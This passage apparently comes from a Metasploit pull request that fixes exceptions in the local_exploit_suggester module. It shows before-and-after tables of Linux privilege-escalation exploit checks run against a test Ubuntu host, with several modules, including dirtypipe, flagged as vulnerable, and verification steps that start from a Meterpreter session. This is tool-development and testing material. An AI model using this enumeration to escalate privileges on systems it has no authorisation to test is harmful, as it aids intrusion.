 12  exploit/linux/local/bpf_priv_esc                                   No                       The target is not exploitable.
 13  exploit/linux/local/bpf_sign_extension_priv_esc                    No                       The target is not exploitable. Kernel version 5.15.0-48-generic is not vulnerable
 14  exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe      No                       The target is not exploitable. Unprivileged BPF loading is not permitted
 15  exploit/linux/local/cve_2021_38648_omigod                          No                       The target is not exploitable. The omiserver process was not found.
 16  exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                No                       The target is not exploitable. The target does not appear vulnerable
 17  exploit/linux/local/desktop_privilege_escalation                   No                       The target is not exploitable.
 18  exploit/linux/local/diamorphine_rootkit_signal_priv_esc            No                       The target is not exploitable. Diamorphine is not installed, or incorrect signal '64'
 19  exploit/linux/local/docker_daemon_privilege_escalation             No                       The target is not exploitable.
 20  exploit/linux/local/docker_privileged_container_escape             No                       The target is not exploitable. Not inside a Docker container
 21  exploit/linux/local/exim4_deliver_message_priv_esc                 No                       The target is not exploitable.
 22  exploit/linux/local/glibc_ld_audit_dso_load_priv_esc               No                       The target is not exploitable.
 23  exploit/linux/local/glibc_origin_expansion_priv_esc                No                       The target is not exploitable.
 24  exploit/linux/local/glibc_realpath_priv_esc                        No                       The target is not exploitable.
 25  exploit/linux/local/hp_xglance_priv_esc                            No                       The check raised an exception.
 26  exploit/linux/local/juju_run_agent_priv_esc                        No                       The target is not exploitable.
 27  exploit/linux/local/ktsuss_suid_priv_esc                           No                       The check raised an exception.
 28  exploit/linux/local/lastore_daemon_dbus_priv_esc                   No                       The target is not exploitable.
 29  exploit/linux/local/libuser_roothelper_priv_esc                    No                       The check raised an exception.
 30  exploit/linux/local/nested_namespace_idmap_limit_priv_esc          No                       The check raised an exception.
 31  exploit/linux/local/netfilter_priv_esc_ipv4                        No                       The target is not exploitable.
 32  exploit/linux/local/network_manager_vpnc_username_priv_esc         No                       The target is not exploitable.
 33  exploit/linux/local/ntfs3g_priv_esc                                No                       The target is not exploitable.
 34  exploit/linux/local/omniresolve_suid_priv_esc                      No                       The check raised an exception.
 35  exploit/linux/local/overlayfs_priv_esc                             No                       The target is not exploitable.
 36  exploit/linux/local/ptrace_sudo_token_priv_esc                     No                       The target is not exploitable.
 37  exploit/linux/local/rds_rds_page_copy_user_priv_esc                No                       The target is not exploitable. Linux kernel version 5.15.0-48-generic is not vulnerable
 38  exploit/linux/local/recvmmsg_priv_esc                              No                       The target is not exploitable.
 39  exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc           No                       The target is not exploitable.
 40  exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc  No                       The target is not exploitable.
 41  exploit/linux/local/sock_sendpage                                  No                       The target is not exploitable.
 42  exploit/linux/local/sophos_wpa_clear_keys                          No                       The target is not exploitable.
 43  exploit/linux/local/systemtap_modprobe_options_priv_esc            No                       The target is not exploitable.
 44  exploit/linux/local/vmware_alsa_config                             No                       The target is not exploitable.
 45  exploit/linux/local/vmware_workspace_one_access_certproxy_lpe      No                       The target is not exploitable. Not running as the horizon user.
 46  exploit/linux/local/zimbra_slapper_priv_esc                        No                       The target is not exploitable.
 47  exploit/linux/local/zpanel_zsudo                                   No                       The target is not exploitable.
 48  exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc         No                       The target is not exploitable.
 49  exploit/multi/local/xorg_x11_suid_server                           No                       The target is not exploitable.
 50  exploit/multi/local/xorg_x11_suid_server_modulepath                No                       The target is not exploitable.
 51  exploit/unix/local/setuid_nmap                                     No                       The check raised an exception.
```

mainly we focus on 
 
```
10  exploit/linux/local/asan_suid_executable_priv_esc                  No                       The check raised an exception.
25  exploit/linux/local/hp_xglance_priv_esc                            No                       The check raised an exception.
27  exploit/linux/local/ktsuss_suid_priv_esc                           No                       The check raised an exception.
29  exploit/linux/local/libuser_roothelper_priv_esc                    No                       The check raised an exception.
30  exploit/linux/local/nested_namespace_idmap_limit_priv_esc          No                       The check raised an exception.
34  exploit/linux/local/omniresolve_suid_priv_esc                      No                       The check raised an exception.
51  exploit/unix/local/setuid_nmap                                     No                       The check raised an exception.

```

## After

no exceptions!

```
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 2.2.2.2 - Collecting local exploits for x86/linux...
[*] 2.2.2.2 - 173 exploit checks are being tried...
[+] 2.2.2.2 - exploit/linux/local/cve_2022_0847_dirtypipe: The target appears to be vulnerable. Linux kernel version found: 5.15.0
[+] 2.2.2.2 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 2.2.2.2 - exploit/linux/local/su_login: The target appears to be vulnerable.
[+] 2.2.2.2 - exploit/linux/local/ubuntu_enlightenment_mount_priv_esc: The target appears to be vulnerable.
[*] Running check method for exploit 51 / 51
[*] 2.2.2.2 - Valid modules for session 2:
============================

 #   Name                                                               Potentially Vulnerable?  Check Result
 -   ----                                                               -----------------------  ------------
 1   exploit/linux/local/cve_2022_0847_dirtypipe                        Yes                      The target appears to be vulnerable. Linux kernel version found: 5.15.0
 2   exploit/linux/local/pkexec                                         Yes                      The service is running, but could not be validated.
 3   exploit/linux/local/su_login                                       Yes                      The target appears to be vulnerable.
 4   exploit/linux/local/ubuntu_enlightenment_mount_priv_esc            Yes                      The target appears to be vulnerable.
 5   exploit/linux/local/abrt_raceabrt_priv_esc                         No                       The target is not exploitable.
 6   exploit/linux/local/abrt_sosreport_priv_esc                        No                       The target is not exploitable.
 7   exploit/linux/local/af_packet_chocobo_root_priv_esc                No                       The target is not exploitable. Linux kernel 5.15.0-48-generic #54-Ubuntu is not vulnerable
 8   exploit/linux/local/af_packet_packet_set_ring_priv_esc             No                       The target is not exploitable.
 9   exploit/linux/local/apport_abrt_chroot_priv_esc                    No                       The target is not exploitable.
 10  exploit/linux/local/asan_suid_executable_priv_esc                  No                       The target is not exploitable.  file not found
 11  exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc         No                       The target is not exploitable.
 12  exploit/linux/local/bpf_priv_esc                                   No                       The target is not exploitable.
 13  exploit/linux/local/bpf_sign_extension_priv_esc                    No                       The target is not exploitable. Kernel version 5.15.0-48-generic is not vulnerable
 14  exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe      No                       The target is not exploitable. Unprivileged BPF loading is not permitted
 15  exploit/linux/local/cve_2021_38648_omigod                          No                       The target is not exploitable. The omiserver process was not found.
 16  exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                No                       The target is not exploitable. The target does not appear vulnerable
 17  exploit/linux/local/desktop_privilege_escalation                   No                       The target is not exploitable.
 18  exploit/linux/local/diamorphine_rootkit_signal_priv_esc            No                       The target is not exploitable. Diamorphine is not installed, or incorrect signal '64'
 19  exploit/linux/local/docker_daemon_privilege_escalation             No                       The target is not exploitable.
 20  exploit/linux/local/docker_privileged_container_escape             No                       The target is not exploitable. Not inside a Docker container
 21  exploit/linux/local/exim4_deliver_message_priv_esc                 No                       The target is not exploitable.
 22  exploit/linux/local/glibc_ld_audit_dso_load_priv_esc               No                       The target is not exploitable.
 23  exploit/linux/local/glibc_origin_expansion_priv_esc                No                       The target is not exploitable.
 24  exploit/linux/local/glibc_realpath_priv_esc                        No                       The target is not exploitable.
 25  exploit/linux/local/hp_xglance_priv_esc                            No                       The target is not exploitable. /opt/perf/bin/xglance-bin file not found
 26  exploit/linux/local/juju_run_agent_priv_esc                        No                       The target is not exploitable.
 27  exploit/linux/local/ktsuss_suid_priv_esc                           No                       The target is not exploitable. /usr/bin/ktsuss file not found
 28  exploit/linux/local/lastore_daemon_dbus_priv_esc                   No                       The target is not exploitable.
 29  exploit/linux/local/libuser_roothelper_priv_esc                    No                       The target is not exploitable. /usr/sbin/userhelper file not found
 30  exploit/linux/local/nested_namespace_idmap_limit_priv_esc          No                       The target is not exploitable. /usr/bin/newuidmap file not found
 31  exploit/linux/local/netfilter_priv_esc_ipv4                        No                       The target is not exploitable.
 32  exploit/linux/local/network_manager_vpnc_username_priv_esc         No                       The target is not exploitable.
 33  exploit/linux/local/ntfs3g_priv_esc                                No                       The target is not exploitable.
 34  exploit/linux/local/omniresolve_suid_priv_esc                      No                       The target is not exploitable. /opt/omni/lbin/omniresolve file not found
 35  exploit/linux/local/overlayfs_priv_esc                             No                       The target is not exploitable.
 36  exploit/linux/local/ptrace_sudo_token_priv_esc                     No                       The target is not exploitable.
 37  exploit/linux/local/rds_rds_page_copy_user_priv_esc                No                       The target is not exploitable. Linux kernel version 5.15.0-48-generic is not vulnerable
 38  exploit/linux/local/recvmmsg_priv_esc                              No                       The target is not exploitable.
 39  exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc           No                       The target is not exploitable.
 40  exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc  No                       The target is not exploitable. /usr/local/Serv-U/Serv-U file not found
 41  exploit/linux/local/sock_sendpage                                  No                       The target is not exploitable.
 42  exploit/linux/local/sophos_wpa_clear_keys                          No                       The target is not exploitable.
 43  exploit/linux/local/systemtap_modprobe_options_priv_esc            No                       The target is not exploitable. /usr/bin/staprun file not found
 44  exploit/linux/local/vmware_alsa_config                             No                       The target is not exploitable.
 45  exploit/linux/local/vmware_workspace_one_access_certproxy_lpe      No                       The target is not exploitable. Not running as the horizon user.
 46  exploit/linux/local/zimbra_slapper_priv_esc                        No                       The target is not exploitable.
 47  exploit/linux/local/zpanel_zsudo                                   No                       The target is not exploitable.
 48  exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc         No                       The target is not exploitable.
 49  exploit/multi/local/xorg_x11_suid_server                           No                       The target is not exploitable.
 50  exploit/multi/local/xorg_x11_suid_server_modulepath                No                       The target is not exploitable.
 51  exploit/unix/local/setuid_nmap                                     No                       The target is not exploitable. /usr/bin/nmap file not found

[*] Post module execution completed
```
 

## Verification



- [ ] Get a meterp running on a linux box (ubuntu 22.04.01 for me)
- [ ] use `local_exploit_suggester`.
- [ ] run it against your meterp session
- [ ] note there are no longer exceptions thrown
